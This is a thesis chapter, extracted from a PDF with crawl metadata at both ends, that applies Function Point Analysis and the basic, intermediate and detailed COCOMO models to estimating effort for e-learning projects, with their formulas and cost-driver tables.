false], [5000, 52103, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 52103, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 52103, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 52103, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 52103, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 52103, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 52103, null]], "pdf_page_numbers": [[0, 4284, 1], [4284, 10114, 2], [10114, 14370, 3], [14370, 18391, 4], [18391, 23625, 5], [23625, 31352, 6], [31352, 34972, 7], [34972, 40588, 8], [40588, 46132, 9], [46132, 52103, 10]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 52103, 0.2043]]}
|
olmocr_science_pdfs
|
2024-11-30
|
2024-11-30
|
1f5b08a95bd23c4eb289348f752310f364f24183
|
CHAPTER 4
EFFORT ESTIMATION ANALYSIS
4.1 INTRODUCTION
Corporate are moving forward from an industrial based society to a knowledge based society. They are facing a major issue on how to use the training systems to establish a continuous learning philosophy in training. Corporate view continuous learning as the key to the competitive merits and training is seen as one of the elements of the huge orientation across continuous improvement. The emerging knowledge and skills demand geographic spreading of workspace requiring minimal costs, accessibility for anytime/anywhere way of learning. Here, e-learning provides solution to this scenario to learn anywhere/anytime. However many educational institutions and organization have not updated the infrastructure and resources to run e-learning solutions.
Many organizations are working to expand e-learning interventions as it becomes more complex to assess their readiness to enhance technology for successful implementation the system successfully. The learning strategies are adjusted with the help of e-learning effort estimation. Also, the previous failures of e-learning interferences show the way to implement a comprehensive readiness assessment to minimize the risk. Still, none of the effort estimation techniques are accepted by the community since none of them delivers reliable for diverse environments. Each technique is suitable for some specific domain due to their nature and characteristics.
This chapter proposes an effort estimation technique which is suitable for e-learning effort estimation. The proposed model is formulated
with the help of Functional Point Analysis (FPA) with the basic COCOMO model. Finally, the Linear Regression Method is applied across the estimation of effort to show the relationship between the function point and effort estimates.
4.2 CONCEPT OF METHODOLOGY
Effort estimation is the major part in the e-learning project development process. The software sizing techniques are classified into code based sizing and functional size measurements. The code based sizing metric estimates the size and complexity of the project based on the programmed source code. Due to the dedication of essential amount of effort to programming, suitable measure correctly quantifying the code is accepted as perceivable indicator of the software cost. The baseline size of the effort estimation model is the count of new Line of Code (LOC). SLOC is a code based sizing metric. SLOC is referred to as Source LOC that is delivered as the portion of the project which is included as drivers and other necessary software. Code size is defined in terms of thousands of SLOC (KLOC). The objective is to evaluate the amount of intellectual work considered in the project development. Evaluation of SLOC takes the new LOC into account. There are two possibilities:
1. To count the SLOC checklists or supported tools (or)
2. To count the Unadjusted Function Points (UFPs) to translate them through backfiring table to SLOC.
SLOC is largely accepted for the following reasons:
- It is highly concurrent with the software cost.
- They are appropriate inputs for software estimation models.
• It can be precisely and easily counted with the help of software tools which eliminate inconsistencies in SLOC counts.
The basic COCOMO model suites permit a powerful weapon to predict the software costs. Reliable size estimation is very much essential for a good model estimate. Size estimation is still a challenging task due to the projects that are usually developed with the new, re-used and automatically converted codes. FPA method is an alternative approach to code based sizing methods. It considers the static and dynamic features of the sizing system. The static feature is denoted by the data accessed or stored by the system. The dynamic feature reproduces the transactions performed to manipulate and access the data.
4.3 ESTIMATION ANALYSIS ON E-LEARNING PROJECT DEVELOPMENT TOOLS
From the relevant literature, COCOMO is identified as suitable for effort estimation of e-learning projects (Moseley and Valverde 2014). COCOMO appear in three levels such as,
• Basic COCOMO,
• Intermediate COCOMO and
• Advanced or detailed COCOMO
The basic COCOMO model defines a single valued, static model which estimates the project development time and cost as functions of the essential program size expressed in terms of thousands of delivered source instructions (KDSI). The intermediate COCOMO model calculates the effort as the function of the program size and the group of 15 cost drivers which consist of the subjective assessments of hardware personnel, project attributes
and the product. An *advanced or detailed COCOMO model* combines all the properties of the intermediate version with the cost driver’s impact on each stage such as design, analysis, etc. of the software engineering process.
Three types of COCOMO models are applied in the proposed effort estimation model with each of the levels progressively providing precise estimates. Boehm proposed that any software development project can be categorized into any of the following three classes which is classified based on their complexity level:
1. **Organic**
2. **Semi-detached** and
3. **Embedded.**
Boehm not only takes the characteristics of the product, but also considers the development team and environment. These three classes are based on the application, system programs and utility.
**Organic** – A project can be classified as organic, if it means formulating with an easy and well understood application program, the size of the team is reasonably small and the developing members are well versed in designing similar types of projects.
**Semi-detached** – A project can be classified as semi-detached, if it consists of the combination of experienced and inexperienced developers. Developers have only limited experience on the related systems, not familiar with some aspects of the project being created.
**Embedded** – A project can be classified as embedded, if it is strongly coupled with the complex hardware or rigorous regulations on the operational strategies.
In this research work, the e-learning projects are categorized into simple, medium, and complex projects based on their content. Details are provided in Chapter 3. The text-based e-learning courses are categorized into simple projects and the contents are text-based with hyperlinks and other materials. Figure 4.1 shows an easy example of simple e-learning project. It uses only the text-based contents with some illustrative diagrams.

Animation-based e-learning courses are categorized into medium projects and the contents are moving illustrations or diagrams coupled with audio. Figure 4.2 shows an example of medium e-learning project. It uses the whiteboard animation to showcase the author's resume and his career background.
Figure 4.2 Example of medium e learning project (text + audio based)
Video based courses and the combination of text, audio and video based courses are categorized into complex projects.
Figure 4.3 Example for complex e learning project (text + audio + video based)
Usually, the contents are full motion video clippings of lecture or a dramatized sequence. Figure 4.3 shows an example of a complex project. The video based online course contains the text, audio and video contents for e-learners.
Organic mode calculation is applied for small projects, the semi-detached calculation is applied for medium projects and the embedded calculation is applied for complex projects. Table 4.1 shows the development modes of the basic COCOMO model. It clearly illustrates the size, innovation, constraints and deviation environment for the three operating modes.
**Table 4.1 Development Modes of Basic COCOMO Model**
<table>
<thead>
<tr>
<th>S. No</th>
<th>Development Mode</th>
<th>Size</th>
<th>Innovation</th>
<th>Constraints</th>
<th>Dev. Environment</th>
</tr>
</thead>
<tbody>
<tr>
<td>1.</td>
<td>Organic</td>
<td>Small</td>
<td>Little</td>
<td>Not tight</td>
<td>Stable</td>
</tr>
<tr>
<td>2.</td>
<td>Semi-detached</td>
<td>Medium</td>
<td>Medium</td>
<td>Medium</td>
<td>Medium</td>
</tr>
<tr>
<td>3.</td>
<td>Embedded</td>
<td>Large</td>
<td>Greater</td>
<td>Tight</td>
<td>Complex hardware/customer interfaces</td>
</tr>
</tbody>
</table>
The basic COCOMO model gives a fairly accurate estimate of the e-learning project parameters. It is expressed based on the following equation:
\[
\text{Effort} = k_1 \times (KLOC)^{k_2}PM
\]
(4.1)
\[
\text{Tdev} = l_1 \times (\text{Effort})^{l_2} \text{ Months}
\]
(4.2)
Here,
- KLOC denotes the estimated size of the e-learning project and it is expressed in terms of kilo lines of code.
• $k_1$, $k_2$, $l_1$, $l_2$ denotes the constants for each category of e-learning projects.
• Tdev denotes the estimated duration for designing the project and it is expressed in terms of months.
• Effort denotes the total duration amount of effort required designing the project and it is expressed in terms of Person Months (PMs).
4.4 PROCEDURE FOR CALCULATING FUNCTION POINT ANALYSIS
Function Point Analysis (FPA) is the standard metric for measuring the functional size of a software system. The first work to be published about function point was written in the late 1970s by A.J. Albrecht of IBM, for a transaction-oriented system (Futrell, et al. 2001). FPA is used to predict the effort estimation of the software project in the early stage of the life cycle. It measures the complexity of the functions and overcome the difficulties of Line of Code. FPA helps the developers and users to quantify the size and complexity of software application functions in a way that is useful to software users (Furey 1997).
Objectives of FPA
FPA measures software by calculating the functionality the software delivers to the user based principally on logical intent. The main objectives of FPA are listed as follows:
• It estimates the software growth and maintains autonomy of technology applied for execution.
• It estimates the functionality that the user requires and receives.
- A consistent measure between the different organizations and projects.
- It is easy to reduce the overhead of the measurement procedure.
4.4.1 Procedure Diagram for Function Point Counting
![Diagram]
**Figure 4.4 Procedure Diagram for function point analysis**
Figure 4.4 shows the procedure diagram for Function Point Counting (FPC).
**Step 1: Determine type of count**
The initial step is to calculate the type of function point count. It can be associated with either applications or projects. There are three kinds of FPCs:
1. Development project FPC
2. Enhancement project FPC
3. Application FPC
**Step 2: Identify the counting scope and boundary**
The counting point describes the functionality that is added in the particular FPC. The application boundary denotes the limit between the software being estimated and the user.
**Step 3: Determine the Unadjusted FPC (UFPC)**
Unadjusted function point specifies the total number of function points depending on the following two factors:
1. Data functions
2. Transaction functions.

**Figure 4.5 Factors of UFPC**
Figure 4.5 illustrates the two factors and their types of UFPC.
**Step 3.1: Count Data Functions**
There are two types of data functions. They are:
1. Internal logical file (ILF): ILF is a user identifiable group of logically related data or control information maintained within the boundary of the application.
2. External Interface File (EIF): EIF is a user identifiable group of logically related data or control information referred by the application, but maintained within the boundary of another application (SE 2010).
**Step 3.2: Count Transaction Functions**
There are three types of transaction functions. They are:
1. External Input (EI): External Inputs are received from the user to the software which provides the application-oriented data.
2. External Output (EO): Things are provided by the software that goes to the outside the system like screen data, report data, error message and so on.
3. External inquires (EI): Inquiries may be the command or requests generated from outside and involving direct access to a database that retrieve the information (SE 2010).
Table 4.2 shows the computing procedure for UFP for the five categories of data and transaction functions. Table 4.2 represent a constant value which is assigned to each other depending on the complexity of the code.
Table 4.2 UFP Calculations
<table>
<thead>
<tr>
<th>Sno</th>
<th>Function Type</th>
<th>Weight by Functional Complexity</th>
<th>Total (FP)</th>
</tr>
</thead>
<tbody>
<tr>
<td>1.</td>
<td>External Input (EI’s)</td>
<td>Low __ x 3</td>
<td>Total = count of EI x 3</td>
</tr>
<tr>
<td></td>
<td></td>
<td>Average __ x 4</td>
<td>Total = count of EI x 4</td>
</tr>
<tr>
<td></td>
<td></td>
<td>High __ x 6</td>
<td>Total = count of EI x 6</td>
</tr>
<tr>
<td>2.</td>
<td>External Output (EO’s)</td>
<td>Low __ x 4</td>
<td>Total = count of EO x 4</td>
</tr>
<tr>
<td></td>
<td></td>
<td>Average __ x 5</td>
<td>Total = count of EO x 5</td>
</tr>
<tr>
<td></td>
<td></td>
<td>High __ x 7</td>
<td>Total = count of EO x 7</td>
</tr>
<tr>
<td>3.</td>
<td>External Enquiry (EI’s)</td>
<td>Low __ x 3</td>
<td>Total = count of EI x 3</td>
</tr>
<tr>
<td></td>
<td></td>
<td>Average __ x 4</td>
<td>Total = count of EI x 4</td>
</tr>
<tr>
<td></td>
<td></td>
<td>High __ x 6</td>
<td>Total = count of EI x 6</td>
</tr>
<tr>
<td>4.</td>
<td>Internal Logical File (ILF)</td>
<td>Low __ x 7</td>
<td>Total = count of ILF x 7</td>
</tr>
<tr>
<td></td>
<td></td>
<td>Average __ x 10</td>
<td>Total = count of ILF x 10</td>
</tr>
<tr>
<td></td>
<td></td>
<td>High __ x 15</td>
<td>Total = count of ILF x 15</td>
</tr>
<tr>
<td>5.</td>
<td>External Interface File (EIF)</td>
<td>Low __ x 5</td>
<td>Total = count of EIF x 5</td>
</tr>
<tr>
<td></td>
<td></td>
<td>Average __ x 7</td>
<td>Total = count of EIF x 7</td>
</tr>
<tr>
<td></td>
<td></td>
<td>High __ x 10</td>
<td>Total = count of EIF x 10</td>
</tr>
</tbody>
</table>
Total Number of UFPs: Sum of the total FP
Step 4: Determine the Value Adjusted Factors (VAF)
VAF represents the general functionality given to the user of the corresponding application. It consists of 14 General System Characteristics (GSCs). Each characteristic has related definitions that assist the degree of influence of the characteristic. It ranges between the scales of 0 to 5 categorizing from no influence to strong influence.
General System Characteristics (GSCs)
The next step following calculation of the unadjusted function point, involves gathering information about the environment and complexity of the project or application and scale from 0 to 5 (degree of influence) (Vickers and Street 2001).
Degree of Influence
Each characteristic should be examined by its Degree of Influence (DI) based on the scale from 0 to 5. Table 4.3 shows the scale value and its influence. The 14 characteristics are illustrated Table 4.4.
**Table 4.3 Degree of Influence**
<table>
<thead>
<tr>
<th>SNo.</th>
<th>Scale</th>
<th>Influence</th>
</tr>
</thead>
<tbody>
<tr>
<td>1.</td>
<td>0</td>
<td>No influence</td>
</tr>
<tr>
<td>2.</td>
<td>1</td>
<td>Incidental influence</td>
</tr>
<tr>
<td>3.</td>
<td>2</td>
<td>Moderate influence</td>
</tr>
<tr>
<td>4.</td>
<td>3</td>
<td>Average influence</td>
</tr>
<tr>
<td>5.</td>
<td>4</td>
<td>Significant influence</td>
</tr>
<tr>
<td>6.</td>
<td>5</td>
<td>Strong influence</td>
</tr>
</tbody>
</table>
**Table 4.4 General System Characteristics (Vickers and Street 2001)**
<table>
<thead>
<tr>
<th>Sno.</th>
<th>General System Characteristics</th>
</tr>
</thead>
<tbody>
<tr>
<td>1.</td>
<td>Data Communication</td>
</tr>
<tr>
<td>2.</td>
<td>Distributed Data Processing</td>
</tr>
<tr>
<td>3.</td>
<td>Is performance critical?</td>
</tr>
<tr>
<td>4.</td>
<td>Heavily Used configuration</td>
</tr>
<tr>
<td>5.</td>
<td>Transaction Rate</td>
</tr>
<tr>
<td>6.</td>
<td>Online Data Entry</td>
</tr>
<tr>
<td>7.</td>
<td>End-User Efficiency</td>
</tr>
<tr>
<td>8.</td>
<td>Online Update</td>
</tr>
<tr>
<td>9.</td>
<td>Complex Processing</td>
</tr>
<tr>
<td>10.</td>
<td>Reusability</td>
</tr>
<tr>
<td>11.</td>
<td>Installation Ease</td>
</tr>
<tr>
<td>12.</td>
<td>Operational Ease</td>
</tr>
<tr>
<td>13.</td>
<td>Multiple Site</td>
</tr>
<tr>
<td>14.</td>
<td>Facility Change</td>
</tr>
</tbody>
</table>
Data Communication
Data communication defines the degree of direct interaction of the system with other applications. The data and control details are sent and received through suitable communication services. Terminals associated with the control unit are considered in the utilization of the communication services. All the data communication connection needs some kind of protocol, which is a set of gathered information that allows data transfer between two devices or systems. Table 4.4 describes the score definition for data communication.
Distributed Data Processing
Distributed data processing defines the degree of forwarding of application data or sharing of the data among the components of the application. Distributed data/processing functions are the feature of the application inside the application boundary.
Performance
It defines the degree of influence seeming the response time and throughput performance by the development of the application. The performance objectives are approved by the user in throughput or response, influence the development, design, support and the installation of the application.
Heavily Used Configuration
It defines the degree of influence seeming the computer resource limitations on the application development. A largely applied operational configuration needs special design considerations. The user needs to execute the application on committed device which will greatly be used.
Transaction Rate
It defines the degree of influence seeming the rate of business transactions the application development. The rate is high and it influences the development, design, support and installation of the application.
Online Data Entry
It defines the degree of entry of the data with the help of interactive interactions. An online data entry and control functions are given in the application.
End-User Efficiency
It defines the degree of deliberation for the ease of use and human factors for the user of the estimated application. The online functions highlight the design for end user efficiency. The end user design includes the following things:
- Menus
- Navigational supports such as function keys, jumps and dynamically generated menus
- Scrolling
- Pre-assigned function keys
- Online help and documents
- Automated cursor movement
- Cursor selection of screen data
- Remote printing through online transactions
• Pop-up windows
• Heavy use of highlighting, color underlining, reverse video and other indicators
• Bilingual and multilingual supports
• As few screens as possible to establish a business function
Online Update
It defines the degree of updating seen in the ILFs online. So, the application offers online update for the ILFs.
Complex Processing
It defines the degree of influence seeming which the processing logic influenced the application development. The set of following components are present:
• Sensitive control/ application specific security processing
• Extensive mathematical processing
• Extensive logical processing
• Incomplete transaction due to the exception processing that should be processed again.
• Complex processing to manage the multiple I/O possibilities.
Reusability
It defines the degree of specialty in design of the code and the application formulation and support which can be used in other applications.
Installation Ease
It defines the degree of influence seeming conversion from the previous settings the application development. Installation and conversion ease are the application characteristics. The plan and conversion tools are given and tested at the time of system test phase.
Operational Ease
It defines the degree of influence seeming the application attends to operational concern like start up, recovery and backup processes. The application reduces the requirement of the manual actions such as paper handling, tape mounts and direct on location manual interference.
Multiple Sites
It defines the degree of influence seeming the application has been designed for multiple locations and user associations. It has been successfully formulated, developed and managed to be installed at various sites for various organizations.
Facilitate Change
- Flexible query and report ability are given to help management of the simple requests such as logic applied to only one ILF.
- Flexible query and report ability are given to help management of requests of average complexity such as logic applied to more than one ILF.
- Flexible query and report ability are given to help management of complex requests such as logic mixture on one or more ILF.
• Business control data is reserved in tables which are managed by the user with the online interactive processes. However, modifications take effect only on the following business day.
• Business control data is reserved in tables which are managed by the user with the online interactive processes and the modifications take effect immediately.
Subsequent to all the 14 GSC’s, the Value Adjustment Factors (VAF) is calculated. The formulae that is used to calculate the VAF using equation (4.3) is
\[
VAF = 0.65 + (0.01 \times \sum_{i=0}^{n} C_i)
\]
(4.3)
**Step 5: Calculate the Adjusted FPC (AFPC)**
After calculating the UFP with transactional and data function types and obtaining the VAF values, finally the Function Point Count (FP) is calculated. The formulae for calculating the Function Point is shown in the equation (4.4).
\[
FP = UFP \times VAF
\]
(4.4)
The lines of code can be calculated for the following equation (4.5).
\[
KLOC = 37.65 \times FP
\]
(4.5)
The constant value of 37.65 is average value of the LOC per function point derived from the standard table of conversion from the programming language to SLOC per function point for multi-language support.
4.5 EFFORT ESTIMATION OF E-LEARNING PROJECTS USING BASIC COCOMO
After obtaining the results of the functional size of the e-learning projects, it is necessary to calculate the effort, time and average staff required to complete the project using basic COCOMO model. In the basic COCOMO model the effort, time and cost of the e-learning projects by using only lines of code.
Effort estimation is calculated for simple projects using Boehm’s COCOMO model for organic projects and is depicted in equation (4.6).
\[
\text{Effort} = 2.4 \times (\text{KLOC})^{1.05} \text{Per Month} \quad (4.6)
\]
Effort estimation is calculated for medium projects using Boehm’s COCOMO model for semi-detached projects and is depicted in equation (4.7).
\[
\text{Effort} = 3.0 \times (\text{KLOC})^{1.12} \text{Per Month} \quad (4.7)
\]
Effort estimation is calculated for complex projects using Boehm’s COCOMO model for embedded projects and is depicted in equation (4.8).
\[
\text{Effort} = 3.6 \times (\text{KLOC})^{1.20} \text{Per Month} \quad (4.8)
\]
The estimation of development time can be calculated using organic, semi-detached and embedded formulae which is used for the all the three categories of the projects.
The effort estimation of development for simple projects can be considered by organic types, as only the e-learning text content is involved in these projects. The development team can be of a small size because it is easy to create the content by subject experts and it can be easily implemented by
instructional designer. The development times needed for the simple projects are calculated the formulae given in the equation (4.9).
\[
\text{Organic} \quad : \quad T_{\text{dev}} = 2.5(\text{Effort})^{0.38} \quad (4.9)
\]
Effort estimation of the medium projects can be considered by Semi-detached types, as it involves text, animation, audio and video etc. It can be a mixture of the developers like content developer, animation and give the effects to the pictures etc. The development times needed for the medium projects are calculated using formulae given in the equation (4.10).
\[
\text{Semi-detached} : T_{\text{dev}} = 2.5(\text{Effort})^{0.35} \quad (4.10)
\]
Complex projects are like creation of complex animations, simulation and action scripts etc., are considered by embedded types. The development times needed for the projects are calculated using the formulae given in the equation (4.11).
\[
\text{Embedded} \quad : \quad T_{\text{dev}} = 2.5(\text{Effort})^{0.32} \quad (4.11)
\]
In the three types of projects, the estimation of development time is calculated according to Boehm definition of organic, semi-detached and embedded.
### 4.6 INTERMEDIATE COCOMO MODEL IN E-LEARNING PROJECTS
Intermediate COCOMO model utilizes the size and modes as similar to the basic COCOMO model. Additionally, it has 15 variables called cost drivers and the modified effort equations. KLOC and cost driver ratings are given as the input to this model which improves the effort estimates. The intermediate COCOMO formula is given equation (4.12).
\[ Effort (E) = a \times (size)^b \times C \]
(4.12)
In this equation, the constants for coefficients and exponents vary for each mode (a and b are coefficients). This model also has three types of modes as similar to the basic model with some modifications. The equations are:
Effort calculation for organic mode,
\[ E = 3.2 \times (size)^{1.05} \times C \]
(4.13)
Effort calculation for semidetached mode,
\[ E = 3.0 \times (size)^{1.12} \times C \]
(4.14)
Effort calculation for embedded mode,
\[ E = 2.8 \times (size)^{1.20} \times C \]
(4.15)
### 4.6.1 Cost Drivers
An Effort Adjustment Factor (EAF) refers the effect of increasing/decreasing the effort and hence the cost is based on the set of environmental factors. These factors are also called as cost drivers or cost adjustment factors (\(C_i\)s)
**Steps to determine the multiplying factor:**
1. Assign the numerical factors to the cost drivers.
2. Multiply the cost factors collectively to formulate the EAF.
Collective multiplication of the cost factors, it affects the project schedule and cost estimation by 10 times or even more. Product of cost drivers is given as follows,
\[ EAF = C_1 \times C_2 \times \ldots \times C_n \]
(4.16)
$C_i = i^{th}$ cost adjustment factor
$C_i = 1$ represents the cost driver does not apply
$C_i > 1$ represents increased cost due to this factor
$C_i < 1$ represents decreased cost due to this factor.
### 4.6.2 Categories of Cost Drivers
Cost drivers are classified into four categories. They are:
1. Product Attributes
2. Computer Attributes
3. Project Attributes
4. Personnel Attributes
**Product Attributes** – Some of the attributes are used to enhance or laying down the project cost depending on the nature of the project to be done or the project itself. Those attributes include:
- Essential reliability – mainly related to real time applications
- Product complexity – mainly related to execution time constraints
- Database size – mainly related to data processing applications
**Computer Attributes** – These attributes use the computer platform as the supporting tool to do with the project to be done.
- Execution time constraints – seen when the processor speed is hardly sufficient
- Virtual machine volatility – seen to the hardware and operating system of the target system
- Computer turnaround time – applied for development
- Main storage constraints – seen when the memory size is hardly sufficient
**Project Attributes** – These attributes are related to tools and practices.
- Modern programming practices – Uses structures method or object oriented ones.
- Schedule compression / expansion – divergence from ideal can never assist, but shorter is worse than longer.
- Modern programming tools – uses good debuggers, CASE, test generation tools.
**Personnel Attributes** – These attributes describe the person who do the job. These factors have the tendency to increase or decrease the cost.
- Programmer capability
- Analyst capability
- Application experience
- Programming language experience – uses tools and practices
- Virtual machine experience – uses hardware and operating system.
**Other Cost Drivers** – Some of the additional attributes are sometimes added by the project manager of other company strengths or weaknesses. These include:
- Development of machine volatility – compilers, unstable OS, CASE tools etc.
• Requirement volatility – few is expected, but too much can be a great issue
• Access to data - sometimes, it is very difficult
• Security requirements – applied for classified programs
• Impact of physical surroundings
• Impact of imposed methods and standards
**Table 4.5 Categories of Intermediate COCOMO Cost Driver**
<table>
<thead>
<tr>
<th>Product</th>
<th>Computer</th>
<th>Personnel</th>
<th>Project</th>
</tr>
</thead>
<tbody>
<tr>
<td>Required Software Reliability</td>
<td>Execution Time Constraint (TIME)</td>
<td>Analyst Capability (ACAP)</td>
<td>Use of Modern Programming Practices (MODP)</td>
</tr>
<tr>
<td>(RELY)</td>
<td>Main Storage Constraint (STOR)</td>
<td>Application</td>
<td></td>
</tr>
<tr>
<td>Database Size (DATA)</td>
<td>Virtual Machine Volatility (VIRT)</td>
<td>Experience (AEXP) Programmer</td>
<td>Use of Software Tools (TOOL)</td>
</tr>
<tr>
<td>Product Complexity (CPLX)</td>
<td>Computer Turnaround Time (TURN)</td>
<td>Capability (PCAP) Virtual Machine</td>
<td>Required Development Schedule (SCED)</td>
</tr>
</tbody>
</table>
Table 4.5 illustrates the set of the attributes with their corresponding categories. The product of cost drivers are given as follows:
\[
C = RELY \times DATA \times CPLX \times TIME \times STOR \times VIRT \times \\
TURN \times ACAP \times AEXP \times PCAP \times VEXP \times LEXP \times MODP \times \\
TOOL \times SCED
\]
(4.17)
Each cost driver estimates a multiplying factor which determines the effect of the attribute on the effort volume.
Each attribute receives a rating on a six point scale which usually ranges between very low categories going up to extra high category. The following table shows an effort multiplier that applies to the rating. Table 4.6 illustrates the six point scale rating for each cost drivers.
### Table 4.6 Six Point Scale Rating
<table>
<thead>
<tr>
<th>Sno.</th>
<th>Cost Drivers</th>
<th>Ratings</th>
<th>Very Low</th>
<th>Low</th>
<th>Nominal</th>
<th>High</th>
<th>Very High</th>
<th>Extra High</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Product Attributes</strong></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>1.</td>
<td>RELY</td>
<td>0.75</td>
<td>0.88</td>
<td>1.00</td>
<td>1.15</td>
<td>1.40</td>
<td></td>
<td></td>
</tr>
<tr>
<td>2.</td>
<td>DATA</td>
<td>0.94</td>
<td>1.00</td>
<td>1.08</td>
<td>1.16</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>3.</td>
<td>CPLX</td>
<td>0.70</td>
<td>0.85</td>
<td>1.00</td>
<td>1.15</td>
<td>1.30</td>
<td>1.65</td>
<td></td>
</tr>
<tr>
<td><strong>Hardware Attributes</strong></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>4.</td>
<td>TIME</td>
<td></td>
<td>1.00</td>
<td>1.11</td>
<td>1.30</td>
<td>1.66</td>
<td></td>
<td></td>
</tr>
<tr>
<td>5.</td>
<td>STOR</td>
<td></td>
<td>1.00</td>
<td>1.06</td>
<td>1.21</td>
<td>1.56</td>
<td></td>
<td></td>
</tr>
<tr>
<td>6.</td>
<td>VIRT</td>
<td>0.87</td>
<td>1.00</td>
<td>1.15</td>
<td>1.30</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>7.</td>
<td>TURN</td>
<td>0.87</td>
<td>1.00</td>
<td>1.07</td>
<td>1.15</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td><strong>Personnel Attributes</strong></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>8.</td>
<td>ACAP</td>
<td>1.46</td>
<td>1.19</td>
<td>1.00</td>
<td>0.86</td>
<td>0.71</td>
<td></td>
<td></td>
</tr>
<tr>
<td>9.</td>
<td>AEXP</td>
<td>1.29</td>
<td>1.13</td>
<td>1.00</td>
<td>0.91</td>
<td>0.82</td>
<td></td>
<td></td>
</tr>
<tr>
<td>10.</td>
<td>PCAP</td>
<td>1.42</td>
<td>1.17</td>
<td>1.00</td>
<td>0.86</td>
<td>0.70</td>
<td></td>
<td></td>
</tr>
<tr>
<td>11.</td>
<td>VEXP</td>
<td>1.21</td>
<td>1.10</td>
<td>1.00</td>
<td>0.90</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>12.</td>
<td>LEXP</td>
<td>1.14</td>
<td>1.07</td>
<td>1.00</td>
<td>0.95</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td><strong>Project Attributes</strong></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>13.</td>
<td>MODP</td>
<td>1.24</td>
<td>1.10</td>
<td>1.00</td>
<td>0.91</td>
<td>0.82</td>
<td></td>
<td></td>
</tr>
<tr>
<td>14.</td>
<td>TOOL</td>
<td>1.24</td>
<td>1.10</td>
<td>1.00</td>
<td>0.91</td>
<td>0.83</td>
<td></td>
<td></td>
</tr>
<tr>
<td>15.</td>
<td>SCED</td>
<td>1.23</td>
<td>1.08</td>
<td>1.00</td>
<td>1.04</td>
<td>1.10</td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
The intermediate COCOMO model is represented as follows:
\[
E = a_i(KLOC)^{b_i}(EAF)
\]
(4.18)
Here, E denotes the effort applied for person-month,
KLOC denotes the estimated number of thousands of delivered LOC,
EAF denotes the factor estimated,
\[ a_i \] is the coefficient and \[ b_i \] is the exponent.
The development time estimation is similar to the basic COCOMO model.
4.7 DETAILED COCOMO MODEL IN E-LEARNING PROJECTS
The detailed COCOMO model includes all the properties of the intermediate version with the impact of cost drivers on each step of the software engineering process. This model uses the different effort multipliers applied for each cost driver attribute. It estimates the amount of effort needed to complete the each phase. Here, the e-learning project is divided into different modules and the COCOMO model is applied to determine the effort and then sums up the effort. The effort of the e-learning project is estimated based on the project size and cost drivers according the software life cycle. The five phases of this COCOMO model are:
- Plan and Requirement
- System design
- Detailed design
- Module code and test
- Integration and test
4.8 SUMMARY
In the proposed method, the three types of COCOMO models are applied on the e-learning project to determine the efforts required for project completion. The experimentation results and analysis on the e-learning project outcomes are explained in the next chapter.
|
{"Source-Url": "http://shodhganga.inflibnet.ac.in:8080/jspui/bitstream/10603/196274/12/12_chapter%204.pdf", "len_cl100k_base": 8709, "olmocr-version": "0.1.53", "pdf-total-pages": 26, "total-fallback-pages": 0, "total-input-tokens": 49679, "total-output-tokens": 8832, "length": "2e13", "weborganizer": {"__label__adult": 0.0004835128784179687, "__label__art_design": 0.0006251335144042969, "__label__crime_law": 0.0003800392150878906, "__label__education_jobs": 0.022979736328125, "__label__entertainment": 0.00010460615158081056, "__label__fashion_beauty": 0.00022840499877929688, "__label__finance_business": 0.0027675628662109375, "__label__food_dining": 0.0005869865417480469, "__label__games": 0.0009446144104003906, "__label__hardware": 0.0009784698486328125, "__label__health": 0.000667572021484375, "__label__history": 0.0003304481506347656, "__label__home_hobbies": 0.00019943714141845703, "__label__industrial": 0.0007753372192382812, "__label__literature": 0.0004477500915527344, "__label__politics": 0.0002541542053222656, "__label__religion": 0.0004763603210449219, "__label__science_tech": 0.01264190673828125, "__label__social_life": 0.00019240379333496096, "__label__software": 0.01079559326171875, "__label__software_dev": 0.94189453125, "__label__sports_fitness": 0.000339508056640625, "__label__transportation": 0.0006890296936035156, "__label__travel": 0.0003325939178466797}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 33473, 0.04015]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 33473, 0.41193]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 33473, 0.88464]], "google_gemma-3-12b-it_contains_pii": [[0, 1604, false], [1604, 3172, null], [3172, 4663, null], [4663, 5981, null], [5981, 6959, null], [6959, 7227, null], [7227, 8701, null], [8701, 10089, null], [10089, 10625, null], [10625, 11348, null], [11348, 12507, null], [12507, 14848, null], [14848, 16448, null], [16448, 17906, null], [17906, 18844, null], [18844, 19788, null], [19788, 21045, null], [21045, 22242, null], [22242, 23755, null], [23755, 25315, null], [25315, 26536, null], [26536, 27543, null], [27543, 28699, null], [28699, 30186, null], [30186, 32235, null], [32235, 33473, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1604, true], [1604, 3172, null], [3172, 4663, null], [4663, 5981, null], [5981, 6959, null], [6959, 7227, null], [7227, 8701, null], [8701, 10089, null], [10089, 10625, null], [10625, 11348, null], [11348, 12507, null], 